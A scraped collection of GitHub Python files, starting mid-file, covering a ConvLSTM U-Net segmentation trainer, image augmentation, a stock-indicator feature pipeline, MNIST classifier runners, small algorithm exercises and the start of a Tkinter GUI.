w_start:w_start + width]\r\n img_arry = cv2.resize(img_new, target_size, interpolation=cv2.INTER_CUBIC)\r\n\r\n if multi_mask is True:\r\n # print(img_arry.shape)\r\n mask = np.zeros(shape=img_arry.shape + (num_class,))\r\n color_dict = [0, 50, 100, 150, 200]\r\n # defining the grey scale pixels for\r\n # Left_labels, Maryland_labels, Ot_labels, Right_labels seperatelly\r\n for i in range(num_class):\r\n mask[img_arry == color_dict[i], i] = 1 # background is one of the Five classes\r\n img_arry = mask\r\n\r\n else:\r\n img_arry = img_arry - np.mean(img_arry).astype('uint8')\r\n img_arry = np.reshape(img_arry, (img_arry.shape[0], img_arry.shape[1], 1))\r\n\r\n x = np.expand_dims(img_arry, axis=0)\r\n return x\r\n\r\n\r\ndef my_gen(time_seq, path, image_folder, mask_folder,\r\n batch_size, target_size=(256, 256)):\r\n # img_list = glob.glob(path + '*.png') # 获取path里面所有图片的路径\r\n image_path = path + '/' + image_folder\r\n mask_path = path + '/' + mask_folder\r\n img_list = os.listdir(image_path)\r\n msk_list = os.listdir(mask_path)\r\n steps = len(img_list) // time_seq # get the integer to the floor\r\n # print(steps)\r\n print(\"Found %s images.\" % len(img_list))\r\n print(\"Found %s masks.\" % len(msk_list))\r\n\r\n while True:\r\n time_array = []\r\n mask_array = []\r\n counter = 0\r\n for i in range(steps):\r\n counter += 1\r\n batch_list = img_list[i * time_seq: i * time_seq + time_seq]\r\n mask_list = msk_list[i * time_seq: i * time_seq + time_seq]\r\n x = [read_img(str(image_path + '/' + file), target_size, color_mode=\"L\") for file in batch_list]\r\n y = [read_img(str(mask_path + '/' + file), target_size, color_mode=\"L\", multi_mask=True, num_class=5) for file in\r\n mask_list]\r\n # print(x[0][0].shape)\r\n # t = Image.fromarray(x[0][0])\r\n # t.show()\r\n batch_x = np.concatenate([array for array in x])\r\n batch_y = np.concatenate([arr for arr in y])\r\n # print(\"batch_x = %s\" %(batch_x.shape)) (3, 256, 256, 1)\r\n # print(\"batch_y = %s\" %(batch_y.shape)) # (3, 256, 256, 5)\r\n\r\n time_array.append(batch_x)\r\n mask_array.append(batch_y)\r\n\r\n augmenters_imgs = [iaa.Affine(rotate=(-10, 10)),\r\n iaa.ElasticTransformation(sigma=0.2)]\r\n\r\n seq_imgs = iaa.Sequential(augmenters_imgs, random_order=False)\r\n\r\n if counter % batch_size == 0:\r\n seq_imgs_deterministic = seq_imgs.to_deterministic() # call this everytime reset the seed\r\n for i in range(batch_size):\r\n time_array[i] = np.expand_dims(np.array(seq_imgs_deterministic.augment_images(time_array[i])),\r\n axis=0)\r\n mask_array[i] = np.expand_dims(np.array(seq_imgs_deterministic.augment_images(mask_array[i])),\r\n axis=0)\r\n # print(\"batch_x = %s\" %(batch_x.shape)) # (1, 3, 256, 256, 1)\r\n # print(\"batch_y = %s\" %(batch_y.shape)) # (1, 3, 256, 256, 5)\r\n train_x = np.concatenate([array for array in time_array])\r\n mask_y = np.concatenate([arr for arr in mask_array])\r\n\r\n time_array = [] # every batch_size cube then reset the list to zero\r\n mask_array = []\r\n\r\n # the mask shape (batch_size, sequence, 256, 256, 5)\r\n # the image shape (batch_size, seq, 256, 256, Channel)\r\n\r\n yield train_x, mask_y\r\n\r\n\r\ndef validation_generator(time_seq, path, image_folder, mask_folder,\r\n batch_size, target_size=(256,256)):\r\n image_path = path + '/' + image_folder\r\n mask_path = path + '/' + mask_folder\r\n img_list = os.listdir(image_path)\r\n msk_list = os.listdir(mask_path)\r\n steps = len(img_list) // time_seq # get the integer to the floor\r\n # print(steps)\r\n print(\"Found %s validation_images.\" % len(img_list))\r\n print(\"Found %s validation_masks.\" % len(msk_list))\r\n\r\n while True:\r\n time_array = []\r\n mask_array = []\r\n counter = 0\r\n for i in range(steps):\r\n counter += 1\r\n batch_list = img_list[i * time_seq: i * time_seq + time_seq]\r\n mask_list = msk_list[i * time_seq: i * time_seq + time_seq]\r\n x = [read_img(str(image_path + '/' + file), target_size, color_mode=\"L\") for file in batch_list]\r\n y = [read_img(str(mask_path + '/' + file), target_size, color_mode=\"L\", multi_mask=True, num_class=5) for file in\r\n mask_list]\r\n\r\n batch_x = np.concatenate([array for array in x])\r\n batch_y = np.concatenate([arr for arr in y])\r\n # print(batch_x.shape)\r\n batch_x = np.expand_dims(batch_x, axis=0) # expand the batch axis\r\n batch_y = np.expand_dims(batch_y, axis=0)\r\n # print(batch_x.shape) # (1, 3, 256, 256,1)\r\n time_array.append(batch_x)\r\n mask_array.append(batch_y)\r\n if counter % batch_size == 0:\r\n train_x = np.concatenate([array for array in time_array])\r\n mask_y = np.concatenate([arr for arr in mask_array])\r\n print(len(mask_y))\r\n\r\n time_array = [] # per batch_size cube then reset the list to zero\r\n mask_array = []\r\n\r\n yield train_x, mask_y\r\n\r\n\r\ndef convLSTM_unet(pretrained_weights=None, input_size=(None, 256, 256, 1)):\r\n \r\n inputs = Input(input_size)\r\n conv1 = TimeDistributed(Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal'))(inputs)\r\n conv1 = TimeDistributed(Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal'))(conv1)\r\n pool1 = TimeDistributed(MaxPooling2D(pool_size=(2, 2)))(conv1)\r\n\r\n conv2 = TimeDistributed(Conv2D(128, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal'))(pool1)\r\n conv2 = TimeDistributed(Conv2D(128, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal'))(conv2)\r\n pool2 = TimeDistributed(MaxPooling2D(pool_size=(2, 2)))(conv2)\r\n\r\n conv3 = TimeDistributed(Conv2D(256, 3, activation='relu', padding = 'same', kernel_initializer = 'he_normal'))(pool2)\r\n conv3 = TimeDistributed(Conv2D(256, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal'))(conv3)\r\n pool3 = TimeDistributed(MaxPooling2D(pool_size=(2, 2)))(conv3)\r\n\r\n conv4 = TimeDistributed(Conv2D(512, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal'))(pool3)\r\n conv4 = TimeDistributed(Conv2D(512, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal'))(conv4)\r\n drop4 = TimeDistributed(Dropout(0.5))(conv4)\r\n pool4 = TimeDistributed(MaxPooling2D(pool_size=(2, 2)))(drop4)\r\n\r\n conv5 = TimeDistributed(Conv2D(1024, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal'))(pool4)\r\n conv5 = TimeDistributed(Conv2D(1024, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal'))(conv5)\r\n drop5 = TimeDistributed(Dropout(0.5))(conv5)\r\n\r\n up6 = ConvLSTM2D(512, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal',return_sequences=True)(TimeDistributed(UpSampling2D(size=(2,2)))(drop5))\r\n\r\n merge6 = concatenate([drop4, up6], axis = 4)\r\n conv6 = ConvLSTM2D(512, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal',return_sequences=True)(merge6)\r\n conv6 = ConvLSTM2D(512, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal',return_sequences=True)(conv6)\r\n\r\n up7 = ConvLSTM2D(256, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal',return_sequences=True)\\\r\n (TimeDistributed(UpSampling2D(size = (2,2)))(conv6))\r\n merge7 = concatenate([conv3,up7], axis = 4)\r\n conv7 = ConvLSTM2D(256, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal',return_sequences=True)(merge7)\r\n conv7 = ConvLSTM2D(256, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal',return_sequences=True)(conv7)\r\n\r\n up8 = ConvLSTM2D(128, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal',return_sequences=True)\\\r\n (TimeDistributed(UpSampling2D(size = (2,2)))(conv7))\r\n merge8 = concatenate([conv2,up8], axis = 4)\r\n conv8 = ConvLSTM2D(128, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal', return_sequences=True)(merge8)\r\n conv8 = ConvLSTM2D(128, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal', return_sequences=True)(conv8)\r\n\r\n up9 = ConvLSTM2D(64, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal',return_sequences=True)\\\r\n (TimeDistributed(UpSampling2D(size = (2,2)))(conv8))\r\n merge9 = concatenate([conv1,up9], axis = 4)\r\n conv9 = ConvLSTM2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal', return_sequences=True)(merge9)\r\n conv9 = ConvLSTM2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal', return_sequences=True)(conv9)\r\n conv9 = TimeDistributed(Conv2D(5, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal'))(conv9)\r\n conv10 = TimeDistributed(Conv2D(5, 1, activation = 'softmax'))(conv9)\r\n\r\n model = Model(input=inputs, output=conv10)\r\n\r\n # plot_model(model, to_file='seg_UNet3D.png', show_shapes=True)\r\n # model.summary()\r\n\r\n if(pretrained_weights):\r\n model.load_weights(pretrained_weights)\r\n\r\n return model\r\n\r\n\r\ndef mean_iou(y_true, y_pred):\r\n prec = []\r\n for t in np.arange(0.5, 1.0, 0.05):\r\n y_pred_ = tf.to_int32(y_pred > t)\r\n score, up_opt = tf.metrics.mean_iou(y_true, y_pred_, 2)\r\n K.get_session().run(tf.local_variables_initializer())\r\n with tf.control_dependencies([up_opt]):\r\n score = tf.identity(score)\r\n prec.append(score)\r\n return K.mean(K.stack(prec), axis=0)\r\n\r\n\r\ndef trainModel(train_path, image_folder, mask_folder,\r\n val_path, val_image_folder, val_mask_folder, time_seq, batch_size,\r\n mode_save_dir='unet.h5', num_image=225, epoch=60):\r\n\r\n # input image is sized into input_size = (None, 256, 256, 1) from the generator\r\n model = convLSTM_unet()\r\n # print(\"Training the model\")\r\n model_checkpoint = ModelCheckpoint(mode_save_dir, monitor='loss', verbose=1, save_best_only=True)\r\n\r\n model.compile(optimizer=Adam(lr=1e-4),\r\n loss=\"categorical_crossentropy\", metrics=['accuracy', mean_iou])\r\n\r\n model.fit_generator(my_gen(time_seq, train_path, image_folder, mask_folder, batch_size=batch_size),\r\n steps_per_epoch=num_image/(batch_size*time_seq), epochs=epoch,\r\n validation_data=validation_generator(time_seq,\r\n val_path, val_image_folder, val_mask_folder, batch_size=batch_size),\r\n validation_steps=num_image/(batch_size*time_seq), callbacks=[model_checkpoint])\r\n\r\n\r\nif __name__ == '__main__':\r\n train_path = \"/data/d0/ascstd/hwyong/data/train\"\r\n image_folder = \"left_frames\"\r\n mask_folder = \"pro_mask\"\r\n val_path = \"/data/d0/ascstd/hwyong/data/valid\"\r\n val_image_folder = \"val_train\"\r\n val_mask_folder = \"val_mask\"\r\n model_path = '/data/ssd/public/MAX_YONG/EADseg/unet_multiple_convLSTM_6.h5'\r\n\r\n print(\"Main is functioning\")\r\n\r\n trainModel(train_path, image_folder=image_folder, mask_folder=mask_folder,\r\n val_path=val_path, val_image_folder=val_image_folder,\r\n val_mask_folder=val_mask_folder, time_seq=2,\r\n mode_save_dir=model_path, batch_size=2, num_image=225, epoch=200)\r\n","repo_name":"maxyonghuawei/Unet_seg","sub_path":"Model_multiple_convLstm_imgaug.py","file_name":"Model_multiple_convLstm_imgaug.py","file_ext":"py","file_size_in_byte":13050,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"76"} +{"seq_id":"7834473634","text":"import os, numpy as np\nimport constants as cs\n\ntry:\n\timport cv2\nexcept:\n\timport sys\n\tsys.path.append('/usr/local/lib/python2.7/site-packages')\n\timport cv2\n\ndef remove_augmented_data(folders):\n\tfor folder in folders:\n\t\tall_images=os.listdir(folder)\n\t\tfor image_name in all_images:\n\t\t\timg_path=folder+'/'+image_name\n\t\t\tfor suffix in cs.suffixes.values():\n\t\t\t\tif suffix in img_path:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tos.remove(img_path)\n\t\t\t\t\texcept:\n\t\t\t\t\t\tpass\n\ndef augment_and_save(folders):\n\tfor folder in folders:\n\t\tall_images=os.listdir(folder)\n\t\tfor image_name in all_images:\n\t\t\timg_path=folder+'/'+image_name\n\t\t\timage=cv2.imread(img_path,cv2.IMREAD_COLOR)\n\t\t\tif image is None:\n\t\t\t\tprint('Could not read file: ', img_path)\n\t\t\t\tcontinue\n\t\t\telse:\n\n\t\t\t\ttransform1=cv2.GaussianBlur(image,(3,3),sigmaX=0.2,sigmaY=0.2) #add gaussian blur to image\n\t\t\t\tcv2.imwrite(img_path.replace(cs.file_extension,cs.suffixes['gb']),transform1) #image with gaussian blur\n\n\t\t\t\tif np.random.random() <0.5: #we either flip the image or get a perspective transform about some points\n\t\t\t\t\ttransform2=np.fliplr(image)\n\t\t\t\t\ttransform3= cv2.GaussianBlur(transform2,(3,3),sigmaX=0.2,sigmaY=0.2) #add gaussian blur to transform2\n\t\t\t\t\tcv2.imwrite(img_path.replace(cs.file_extension,cs.suffixes['f']),transform2) #image flipped\n\t\t\t\t\tcv2.imwrite(img_path.replace(cs.file_extension,cs.suffixes['fgb']),transform3) #flipped and gaussian blur\n\t\t\t\telse:\n\t\t\t\t\ttransform2 = cv2.warpPerspective(image,cs.perspective_matrix,(cs.im_width,cs.im_height))\n\t\t\t\t\ttransform3= cv2.GaussianBlur(transform2,(3,3),sigmaX=0.2,sigmaY=0.2) #add gaussian blur to transform2\n\t\t\t\t\tcv2.imwrite(img_path.replace(cs.file_extension,cs.suffixes['p']),transform2) #image perspective transform\n\t\t\t\t\tcv2.imwrite(img_path.replace(cs.file_extension,cs.suffixes['pgb']),transform3) #transform with gaussian blur\n\t\t\t\t\n\t\t\t\t#implements unsharp masking\n\t\t\t\tmask= cv2.filter2D(image,-1,cs.unsharp_kernel)\n\t\t\t\ttransform4= cv2.addWeighted(src1=image,alpha=1.05,src2=mask,beta=-0.05,gamma=0) #output= alpha*src1 + beta+src2 + gamma\n\t\t\t\tcv2.imwrite(img_path.replace(cs.file_extension,cs.suffixes['um']),transform4) #unsharp masked image\n\n\t\t\t\tif cs.allow_rotation:\n\t\t\t\t\t#implements rotation\n\t\t\t\t\trows,cols = cs.im_width,cs.im_height\n\t\t\t\t\tangle=cs.min_angle+np.random.random()*(cs.max_angle-cs.min_angle)\n\t\t\t\t\tM = cv2.getRotationMatrix2D((cols/2,rows/2),angle,1)\n\t\t\t\t\ttransform5= cv2.warpAffine(image,M1,(cols,rows))\n\t\t\t\t\tcv2.imwrite(img_path.replace(cs.file_extension,cs.suffixes['r']),transform5) #rotated image\n\n\t\t\t\t#break\n\tprint('Done')","repo_name":"dataplayer12/hey-daug","sub_path":"data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"33654944418","text":"from .job import Task\n\n\nclass Broker(object):\n task_cls = Task\n\n def __init__(self, env, task_configs):\n self.env = env\n self.simulation = None\n self.machine = None\n self.destroyed = False\n self.task_configs = task_configs\n\n def attach(self, simulation):\n self.simulation = simulation\n self.machine = simulation.machine\n\n def run(self):\n for task_config in self.task_configs:\n #assert task_config.submit_time >= self.env.now\n #yield self.env.timeout(task_config.submit_time - self.env.now)\n task = Broker.task_cls(self.env, task_config)\n # print('a task arrived at time %f' % self.env.now)\n self.machine.add_task(task)\n self.destroyed = True\n","repo_name":"846468230/DQN","sub_path":"simulations/broker.py","file_name":"broker.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"24059197797","text":"import math\n\n\ndef evaluate(a, b, op):\n if op == '+':\n return a + b\n elif op == '-':\n return a - b\n elif op == '*':\n return a * b\n else:\n assert False\n\n\ndef calculation(M, m, i, j, operators):\n min_value = math.inf\n max_value = -math.inf\n\n for k in range(i, j):\n a = evaluate(M[i][k], M[k+1][j], operators[k])\n b = evaluate(M[i][k], m[k+1][j], operators[k])\n c = evaluate(m[i][k], M[k+1][j], operators[k])\n d = evaluate(m[i][k], m[k+1][j], operators[k])\n min_value = min(min_value, a, b, c, d)\n max_value = max(max_value, a, b, c, d)\n return min_value, max_value\n\n\ndef maximum_value(operators, values):\n m = [[0 for x in range(len(values))] for x in range(len(values))]\n M = [[0 for x in range(len(values))] for x in range(len(values))]\n\n for i in range(len(values)):\n m[i][i] = values[i]\n M[i][i] = values[i]\n\n for s in range(1, len(values)):\n for i in range(0, len(values)-s):\n j = i + s\n m[i][j], M[i][j] = calculation(M, m, i, j, operators)\n\n return M[0][len(values)-1]\n\n\nif __name__ == \"__main__\":\n input = input()\n operators, values = [], []\n\n for i in input:\n if i in ['+', '-', '*']:\n operators.append(i)\n else:\n values.append(int(i))\n\n print(maximum_value(operators, values))\n","repo_name":"hrap01/algorithms_data_structures","sub_path":"01 Algorithmic Toolbox/06_placing paretheses.py","file_name":"06_placing paretheses.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"10104992338","text":"import clr\nclr.AddReference(r'dll/Skender.Stock.Indicators')\n\nimport FinanceHistoryDataReader.QouteHistory as qh\nimport FinanceHistoryDataReader.Indicator as Indicator\nimport FinanceHistoryDataReader.processing as processing\n\n##############################\nTICKER = \"CVX\"\n\nMARKET = \"XNYS\"\nMARKET_NAME = \"nyse\"\nMARKET_TICKER = \"IXIC\"\n\nYEAR_FROM = \"2010\"\n\nWTI_ENABLE = True\nNLP_ENABLE = True\n\nNAN_FILLER_DECAY = 0.02\n##############################\nfeature_list = []\n\n# Fetching\nprint(\"Fetching OHLCV and other related price data...\")\nprice_history = qh.get_history(TICKER, YEAR_FROM, market=MARKET, per=True, pbr=True)\nqh.fill_nan(price_history, \"per\")\nqh.fill_nan(price_history, \"pbr\")\n\n\n# Technical Indicators\nqh.add_column_by_day(price_history, \"aroon_5\", Indicator.get_AROON(price_history, 5))\nqh.add_column_by_day(price_history, \"adx_5\", Indicator.get_ADX(price_history, 5))\nqh.add_column_by_day(price_history, \"elder_ray_bull_5\", Indicator.get_elder_ray_bull(price_history, 5))\nqh.add_column_by_day(price_history, \"elder_ray_bear_5\", Indicator.get_elder_ray_bear(price_history, 5))\nqh.add_column_by_day(price_history, \"vortex_pos_5\", Indicator.get_vortex_positive(price_history, 5))\nqh.add_column_by_day(price_history, \"vortex_neg_5\", Indicator.get_vortex_negative(price_history, 5))\nqh.add_column_by_day(price_history, \"donchian_5\", Indicator.get_donchian(price_history, 5))\nqh.add_column_by_day(price_history, \"fcb_upper_5\", Indicator.get_fcb_upper(price_history, 5))\nqh.add_column_by_day(price_history, \"fcb_lower_5\", Indicator.get_fcb_lower(price_history, 5))\n\nqh.add_column_by_day(price_history, \"gator_upper\", Indicator.get_gator_upper(price_history))\nqh.add_column_by_day(price_history, \"gator_lower\", Indicator.get_gator_lower(price_history))\nqh.add_column_by_day(price_history, \"alligator_jaw\", Indicator.get_alligator_jaw(price_history))\nqh.add_column_by_day(price_history, \"alligator_teeth\", Indicator.get_alligator_teeth(price_history))\nqh.add_column_by_day(price_history, \"alligator_lips\", Indicator.get_alligator_lips(price_history))\n\nqh.add_column_by_day(price_history, \"ichimoku_9_26_52\", Indicator.get_ichimoku(price_history, 9, 26, 52))\nqh.add_column_by_day(price_history, \"macd_12_26_9\", Indicator.get_macd(price_history, 12, 26, 9))\nqh.add_column_by_day(price_history, \"super_trend_14_3\", Indicator.get_super_trend(price_history, 14,3))\nqh.add_column_by_day(price_history, \"bollinger_bands_upper_20_2\", Indicator.get_bollinger_bands_upper(price_history, 20,2))\nqh.add_column_by_day(price_history, \"bollinger_bands_lower_20_2\", Indicator.get_bollinger_bands_lower(price_history, 20,2))\nqh.add_column_by_day(price_history, \"std_dev_channels_20_2\", Indicator.get_std_dev_channels(price_history, 20,2))\n\n# Market Moving Avg\nprint(f\"Calculating Market({MARKET_NAME}) Moving Avg...\")\nmarket_history = qh.get_history(MARKET_TICKER, YEAR_FROM)\nmarket_sma5 = Indicator.get_SMA(market_history, 5)\nmarket_sma20 = Indicator.get_SMA(market_history, 20)\nmarket_sma60 = Indicator.get_SMA(market_history, 60)\nmarket_sma120 = Indicator.get_SMA(market_history, 120)\n\nqh.add_column_by_day(price_history, \"market_sma5\", market_sma5)\nqh.add_column_by_day(price_history, \"market_sma20\", market_sma20)\nqh.add_column_by_day(price_history, \"market_sma60\", market_sma60)\nqh.add_column_by_day(price_history, \"market_sma120\", market_sma120)\n\n# U.S bond Moving Avg\nprint(\"Calculating U.S bond Moving Avg...\")\nbond_u3y_history = qh.get_history('US3YT=X', YEAR_FROM)\nbond_u3y_sma5 = Indicator.get_SMA(bond_u3y_history, 5)\nbond_u3y_sma20 = Indicator.get_SMA(bond_u3y_history, 20)\nbond_u3y_sma60 = Indicator.get_SMA(bond_u3y_history, 60)\nbond_u3y_sma120 = Indicator.get_SMA(bond_u3y_history, 120)\n\nqh.add_column_by_day(price_history, \"bond_u3y_sma5\", bond_u3y_sma5)\nqh.add_column_by_day(price_history, \"bond_u3y_sma20\", bond_u3y_sma20)\nqh.add_column_by_day(price_history, \"bond_u3y_sma60\", bond_u3y_sma60)\nqh.add_column_by_day(price_history, \"bond_u3y_sma120\", bond_u3y_sma120)\n\n# WTI Moving Avg\nif WTI_ENABLE:\n print(\"Calculating WTI Moving Avg...\")\n wti_history = qh.get_history(\"CL\", YEAR_FROM)\n wti_sma5 = Indicator.get_SMA(wti_history, 5)\n wti_sma20 = Indicator.get_SMA(wti_history, 20)\n wti_sma60 = Indicator.get_SMA(wti_history, 60)\n wti_sma120 = Indicator.get_SMA(wti_history, 120)\n \n qh.add_column_by_day(price_history, \"wti_sma5\", wti_sma5)\n qh.add_column_by_day(price_history, \"wti_sma20\", wti_sma20)\n qh.add_column_by_day(price_history, \"wti_sma60\", wti_sma60)\n qh.add_column_by_day(price_history, \"wti_sma120\", wti_sma120)\n\n# Post-processing\nprint(\"Post-processing data...\")\nfeature_list += [\n \"market_sma5\", \"market_sma20\", \"market_sma60\", \"market_sma120\", \n \"bond_u3y_sma5\", \"bond_u3y_sma20\", \"bond_u3y_sma60\", \"bond_u3y_sma120\", \n \"aroon_5\",\n \"adx_5\",\n \"elder_ray_bull_5\",\n \"elder_ray_bear_5\",\n \"vortex_pos_5\",\n \"vortex_neg_5\",\n \"donchian_5\",\n \"fcb_upper_5\",\n \"fcb_lower_5\",\n \"gator_upper\",\n \"gator_lower\",\n \"alligator_jaw\",\n \"alligator_teeth\",\n \"alligator_lips\",\n \"ichimoku_9_26_52\",\n \"macd_12_26_9\",\n \"super_trend_14_3\",\n \"bollinger_bands_upper_20_2\",\n \"bollinger_bands_lower_20_2\",\n \"std_dev_channels_20_2\",\n]\nif WTI_ENABLE:\n feature_list += [ \"wti_sma5\", \"wti_sma20\", \"wti_sma60\", \"wti_sma120\" ]\n\nfor feature in feature_list:\n processing.standardize(price_history, feature)\n\n\n# NLP(https://github.com/kwangwoon-sanhak/SentimentalAnalysis)\nif NLP_ENABLE:\n print(\"Starting NLP...\")\n from calculate_sentiment_score.calculate_sent_score import VocabDictionary\n vocab_dic = VocabDictionary(\"VADER\", TICKER)\n score = vocab_dic.sentiment_analysis()\n\n qh.add_column_by_day(price_history, \"nlp_pos\", score['pos'])\n qh.add_column_by_day(price_history, \"nlp_neg\", score['neg'])\n qh.add_column_by_day(price_history, \"nlp_neu\", score['neu'])\n qh.add_column_by_day(price_history, \"nlp_compound\", score['compound'])\n print(\"NLP finished.\")\n\n print(\"Filling NAN...\")\n qh.fill_nan(price_history, \"nlp_pos\", decay_rate=NAN_FILLER_DECAY)\n qh.fill_nan(price_history, \"nlp_neg\", decay_rate=NAN_FILLER_DECAY)\n qh.fill_nan(price_history, \"nlp_neu\", decay_rate=NAN_FILLER_DECAY)\n qh.fill_nan(price_history, \"nlp_compound\", decay_rate=NAN_FILLER_DECAY)\n\n\n# Save\nprice_history = price_history.dropna()\n\nfile_name = f\"{TICKER}_{YEAR_FROM}_with_{MARKET_NAME}_TA\"\nif WTI_ENABLE:\n file_name += \"_wti\"\n\nif NLP_ENABLE:\n file_name += \"_nlp\"\n\nqh.save_as_csv(price_history, f\"{file_name}.csv\")\n\nprint(price_history)\n","repo_name":"kwangwoon-sanhak/FinanceHistoryDataReader","sub_path":"advanced_example.py","file_name":"advanced_example.py","file_ext":"py","file_size_in_byte":6550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"13658345224","text":"import os\nimport time\nimport numpy as np\nimport gzip\nimport pickle\nfrom sklearn.preprocessing import LabelBinarizer\n\nfrom utils import *\nfrom knn import KNN\nfrom linear_model import softmaxClassifier\nfrom neural_net import NeuralNet\nfrom svm import supportVectorMachine\nimport cnn\n\n\nwith gzip.open(os.path.join('..', 'data', 'mnist.pkl.gz'), 'rb') as f:\n train_set, valid_set, test_set = pickle.load(f, encoding=\"latin1\")\n\nX_train, y_train = train_set\nX_valid, y_valid = valid_set\nX_test, y_test = test_set\n\n\ndef run_KNN_model():\n # final model k=4\n final_model = KNN(4)\n final_model.fit(X_train, y_train)\n y_pred = final_model.predict(X_valid)\n tr_error = np.mean(y_pred != y_valid)\n print(f\"KNN k={4} Validation error: %.5f\" % tr_error)\n y_pred = final_model.predict(X_test)\n test_error = np.mean(y_pred != y_test)\n print(f\"KNN k={4} Test error: %.5f\" % test_error)\n\n\ndef run_linear_model():\n # final model: softmaxClassifier with optTol=1\n model = softmaxClassifier(optTol=1)\n model.fit(X_train, y_train)\n y_pred = model.predict(X_valid)\n tr_error = np.mean(y_pred != y_valid)\n print(f\"softmaxClassifier Validation error: %.5f\" % tr_error)\n y_pred = model.predict(X_test)\n test_error = np.mean(y_pred != y_test)\n print(f\"softmaxClassifier Test error: %.5f\" % test_error)\n\n\ndef run_MLP_model():\n binarizer = LabelBinarizer()\n Y = binarizer.fit_transform(y_train)\n\n # final model: 2 hidden layers each 1024 hidden units\n num_layers = 2\n hidden_layer_sizes = [1024 for _ in range(num_layers)]\n model = NeuralNet(hidden_layer_sizes, learning_rate=1e-3, max_iter=1000)\n\n t = time.time()\n model.fit(X_train, Y)\n print(\"Fitting took %d seconds\" % (time.time() - t))\n\n # save model weights\n with open('../data/2_layer_weights.pickle', 'wb') as f:\n pickle.dump(model.weights, f)\n\n # Compute validation and test errors\n yhat = model.predict(X_valid)\n validError = np.mean(yhat != y_valid)\n print(f\"{num_layers} hidden layers Validation error = \", validError)\n yhat = model.predict(X_test)\n testError = np.mean(yhat != y_test)\n print(f\"{num_layers} hidden layers Test error = \", testError)\n\n\ndef run_SVM_model():\n # final SVM model with hinge loss: C=400, lr=1e-4\n rate = 1e-4\n svm = supportVectorMachine(C=400, learning_rate=rate, maxEvals=1000)\n svm.fit(X_train, y_train)\n\n # Compute validation and test errors\n y_pred = svm.predict(X_valid)\n tr_error = np.mean(y_pred != y_valid)\n print(f\"SVM lr={rate} Validation error: %.5f\" % tr_error)\n y_pred = svm.predict(X_test)\n ts_error = np.mean(y_pred != y_test)\n print(f\"SVM lr={rate} Test error: %.5f\" % ts_error)\n\n\ndef run_CNN_model():\n # read trained model weights for lr=0.01\n with open(os.path.join('..', 'data', 'cnn_lr_1e-2.pkl'), 'rb') as f:\n params = pickle.load(f)\n\n # Compute validation and test errors\n y_pred = cnn.predict(X_valid, params)\n tr_error = np.mean(y_pred != y_valid)\n print(f\"CNN lr={0.01} Validation error: %.5f\" % tr_error)\n y_pred = cnn.predict(X_test, params)\n ts_error = np.mean(y_pred != y_test)\n print(f\"CNN lr={0.01} Test error: %.5f\" % ts_error)\n\n\ndef main():\n run_KNN_model()\n run_linear_model()\n run_SVM_model()\n run_MLP_model()\n run_CNN_model()\n\n\nif __name__ == '__main__':\n main()\n\n\n\n","repo_name":"byeung18/machine-learning","sub_path":"final/code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"10514609401","text":"\"\"\"\r\n1. Two Sum\r\nhttps://leetcode.com/problems/two-sum/\r\n\"\"\"\r\n\r\nclass Solution:\r\n def twoSum(self, nums, target):\r\n for x in range(0, len(nums)):\r\n for y in range(0, len(nums)):\r\n if y != x and nums[x] + nums[y] == target:\r\n return [x, y]\r\n","repo_name":"pmbechard/CodingChallenges","sub_path":"LeetCode/Python/easy/two_sum_1.py","file_name":"two_sum_1.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"14207901395","text":"from tkinter import *\nfrom tkinter import messagebox\nfrom tkinter import filedialog\n\n\nglobal root\nglobal scrnwparam\nglobal scrnhparam\nscrnwparam = 185\nscrnhparam = 150\n\ndef main():\n global root\n\n root = Tk()\n root.resizable(False, False)\n \n scrnw = (root.winfo_screenwidth()//2) - scrnwparam\n scrnh = (root.winfo_screenheight()//2) - scrnhparam\n root.geometry('240x130+{}+{}'.format(scrnw, scrnh))\n \n app = GUI(root)\n root.mainloop()\n\nclass GUI(Frame):\n def __init__(self, parent):\n Frame.__init__(self, parent, background=\"white\") \n self.parent = parent\n self.parent.title(\"\")\n self.pack(fill=BOTH, expand=1)\n self.initUI()\n \n def initUI(self):\n global SLbl\n Lbl = Label(text=\"Папка проекта:\", background=\"white\")\n Lbl.place(x=16, y=10)\n \n global InputDirEntry\n InputDirEntry = Entry(fg=\"black\", bg=\"white\", width=20)\n InputDirEntry.place(x=20, y=32)\n \n 